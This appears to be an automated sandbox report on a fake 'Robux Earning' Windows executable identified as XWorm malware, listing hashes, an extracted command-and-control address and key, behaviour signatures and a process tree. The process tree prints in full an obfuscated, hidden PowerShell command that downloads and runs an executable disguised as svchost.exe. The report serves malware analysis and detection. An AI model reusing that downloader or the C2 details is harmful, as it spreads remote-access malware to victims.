Analysis
-
max time kernel
118s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
07/03/2025, 18:47
Static task
static1
Behavioral task
behavioral1
Sample
Robux Earning V1.0.exe
Resource
win10v2004-20250217-en
General
-
Target
Robux Earning V1.0.exe
-
Size
6.8MB
-
MD5
40e4949832835252d7c13f380a7e34e8
-
SHA1
40413f428911437631362398426b2f2accccaefe
-
SHA256
96a6c1b696660babb99a2de8c47464de947a11c8982277a86fb3814c6c22ada9
-
SHA512
7160d5701d809c6b7bee228f162dab0960a6f300e0428bc3176fca508ecbcad8841b0f663164cb6f08f6db7816af93879a6c08ecc2fd0877e2db84764e018523
-
SSDEEP
98304:4Clb/EOLQw+R0jtL0er+6HMh1igAyKl7MIEGYPkqQMcTVfrrt5pQ:4iAOw0jxNMh1xakPkmcNK
Malware Config
Extracted
xworm
3.1
stay-type.gl.at.ply.gg:46374
jFCh809iryVGfT4C
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000b000000023c34-65.dat family_xworm behavioral1/memory/4144-72-0x0000000000430000-0x000000000043E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 4120 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4120 powershell.exe 4120 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 8 4120 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation Robux Earning V1.0.exe -
Executes dropped EXE 3 IoCs
pid Process 1432 -.exe 2648 -.exe 4144 svchost.exe -
Loads dropped DLL 6 IoCs
pid Process 2648 -.exe 2648 -.exe 2648 -.exe 2648 -.exe 2648 -.exe 2648 -.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023dbb-6.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4120 powershell.exe 4120 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4144 svchost.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3972 wrote to memory of 1432 3972 Robux Earning V1.0.exe 89 PID 3972 wrote to memory of 1432 3972 Robux Earning V1.0.exe 89 PID 3972 wrote to memory of 3708 3972 Robux Earning V1.0.exe 91 PID 3972 wrote to memory of 3708 3972 Robux Earning V1.0.exe 91 PID 3708 wrote to memory of 4120 3708 cmd.exe 93 PID 3708 wrote to memory of 4120 3708 cmd.exe 93 PID 1432 wrote to memory of 2648 1432 -.exe 94 PID 1432 wrote to memory of 2648 1432 -.exe 94 PID 2648 wrote to memory of 852 2648 -.exe 95 PID 2648 wrote to memory of 852 2648 -.exe 95 PID 4120 wrote to memory of 4144 4120 powershell.exe 99 PID 4120 wrote to memory of 4144 4120 powershell.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Robux Earning V1.0.exe"C:\Users\Admin\AppData\Local\Temp\Robux Earning V1.0.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\ProgramData\-.exe"C:\ProgramData\-.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\ProgramData\-.exe"C:\ProgramData\-.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:852
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\SecorKit.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]104);$url+=([char]116);$url+=([char]116);$url+=([char]112);$url+=([char]115);$url+=([char]58);$url+=([char]47);$url+=([char]47);$url+=([char]102);$url+=([char]105);$url+=([char]108);$url+=([char]101);$url+=([char]115);$url+=([char]46);$url+=([char]99);$url+=([char]97);$url+=([char]116);$url+=([char]98);$url+=([char]111);$url+=([char]120);$url+=([char]46);$url+=([char]109);$url+=([char]111);$url+=([char]101);$url+=([char]47);$url+=([char]53);$url+=([char]53);$url+=([char]98);$url+=([char]117);$url+=([char]117);$url+=([char]104);$url+=([char]46);$url+=([char]115);$url+=([char]101);$url+=([char]99);$url+=([char]114);$url+=([char]111);$url+=([char]48);$url+=([char]52);$url+=([char]57);$url+=([char]48);$url+=([char]56);$url+=([char]51);$url+=([char]55);$url+=([char]53);$url+=([char]48);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Users\Public\svchost.exe"C:\Users\Public\svchost.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4144
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.8MB
MD530e2452a76d6a5c739a2b1790a269c35
SHA1fb2f8ddfcf04e02effb15a2dd1a1e903871258e5
SHA25630abf86701b5915651ebcbc4f1c271fe8e4d3a3627826b253ccf20c304b258d9
SHA5123042b3abd47a5393fc31a3aef23a1ba26704d2e22242ec4ca9de0d2b8e71c6ad0361d7659eb58b88b1e6fae4f4459574d852e9804aeb91ed64d7b2bc931275ed
-
Filesize
4KB
MD516761e8a23d0d4a636ca414cc5b15d7a
SHA19ff21e1bed5aa608f170294e800812ebe3c7fbff
SHA256a52a64316c6c417abf09c36e60e2cfe492d051a5a696eeb3b1abb7c91c05734c
SHA5127ebb6376ed87e1deeed99aac5c6120e9a9224aaf0a853c61e8f09709d4038a60c28899e69bdf3b2c2657633da01ac335f80bc6e5ddef0b891739ab80b4258fb8
-
Filesize
106KB
MD54585a96cc4eef6aafd5e27ea09147dc6
SHA1489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286
-
Filesize
82KB
MD528ede9ce9484f078ac4e52592a8704c7
SHA1bcf8d6fe9f42a68563b6ce964bdc615c119992d0
SHA256403e76fe18515a5ea3227cf5f919aa2f32ac3233853c9fb71627f2251c554d09
SHA5128c372f9f6c4d27f7ca9028c6034c17deb6e98cfef690733465c1b44bd212f363625d9c768f8e0bd4c781ddde34ee4316256203ed18fa709d120f56df3cca108b
-
Filesize
120KB
MD522c4892caf560a3ee28cf7f210711f9e
SHA1b30520fadd882b667ecef3b4e5c05dc92e08b95a
SHA256e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c
SHA512edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19
-
Filesize
247KB
MD5baaa9067639597e63b55794a757ddeff
SHA1e8dd6b03ebef0b0a709e6cccff0e9f33c5142304
SHA2566cd52b65e11839f417b212ba5a39f182b0151a711ebc7629dc260b532391db72
SHA5127995c3b818764ad88db82148ea0ce560a0bbe9594ca333671b4c5e5c949f5932210edbd63d4a0e0dc2daf24737b99318e3d5daaee32a5478399a6aa1b9ee3719
-
Filesize
63KB
MD5c888ecc8298c36d498ff8919cebdb4e6
SHA1f904e1832b9d9614fa1b8f23853b3e8c878d649d
SHA25621d59958e2ad1b944c4811a71e88de08c05c5ca07945192ab93da5065fac8926
SHA5127161065608f34d6de32f2c70b7485c4ee38cd3a41ef68a1beacee78e4c5b525d0c1347f148862cf59abd9a4ad0026c2c2939736f4fc4c93e6393b3b53aa7c377
-
Filesize
155KB
MD5d386b7c4dcf589e026abfc7196cf1c4c
SHA1c07ce47ce0e69d233c5bdd0bcac507057d04b2d4
SHA256ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1
SHA51278d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8
-
Filesize
77KB
MD52c0ec225e35a0377ac1d0777631bffe4
SHA17e5d81a06ff8317af52284aedccac6ebace5c390
SHA256301c47c4016dac27811f04f4d7232f24852ef7675e9a4500f0601703ed8f06af
SHA512aea9d34d9e93622b01e702defd437d397f0e7642bc5f9829754d59860b345bbde2dd6d7fe21cc1d0397ff0a9db4ecfe7c38b649d33c5c6f0ead233cb201a73e0
-
Filesize
1.4MB
MD5e3e736075d10dd2e4c57abf1cd901101
SHA1f53c32c9f140d8a0117732916fcb3ea3579733d7
SHA25612f12bb3da2e5efadb60342206008e151573da9a4e6cf546edf838bd5bcb490b
SHA512b5979e9dfef88ca88339c6b868c69bce71cdeb6c4ae5a167074b374cd1ee28a5fd4f726de55428deb4386b61fbf6365cb1164500251b31e0ecb642795a5f016e
-
Filesize
4.9MB
MD551e8a5281c2092e45d8c97fbdbf39560
SHA1c499c810ed83aaadce3b267807e593ec6b121211
SHA2562a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA51298b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb
-
Filesize
38KB
MD50f8e4992ca92baaf54cc0b43aaccce21
SHA1c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA5126e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978
-
Filesize
5.5MB
MD565e381a0b1bc05f71c139b0c7a5b8eb2
SHA17c4a3adf21ebcee5405288fc81fc4be75019d472
SHA25653a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA5124db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39
-
Filesize
29KB
MD58472d39b9ee6051c961021d664c7447e
SHA1b284e3566889359576d43e2e0e99d4acf068e4fb
SHA2568a9a103bc417dede9f6946d9033487c410937e1761d93c358c1600b82f0a711f
SHA512309f1ec491d9c39f4b319e7ce1abdedf11924301e4582d122e261e948705fb71a453fec34f63df9f9abe7f8cc2063a56cd2c2935418ab54be5596aadc2e90ad3
-
Filesize
1.1MB
MD557f8f40cf955561a5044ddffa4f2e144
SHA119218025bcae076529e49dde8c74f12e1b779279
SHA2561a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560
SHA512db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
30KB
MD52dc7a5a27e615f387840aa15b1fa3904
SHA1c6eb7a2cd4982506827f44d74ee0eb432b4f628d
SHA256f032527e2c7d8914827562feda746b784f275b7d7223f43833c2673b50c1f2a7
SHA512f5c385a5ed60d7305a61681a8b11a851730416b3eed8eea57a9d441dcc3d611c51f7693b5503ef5e029bb88f3b1cdfa4a1c65bb5e93aae46a476b688c9c8477c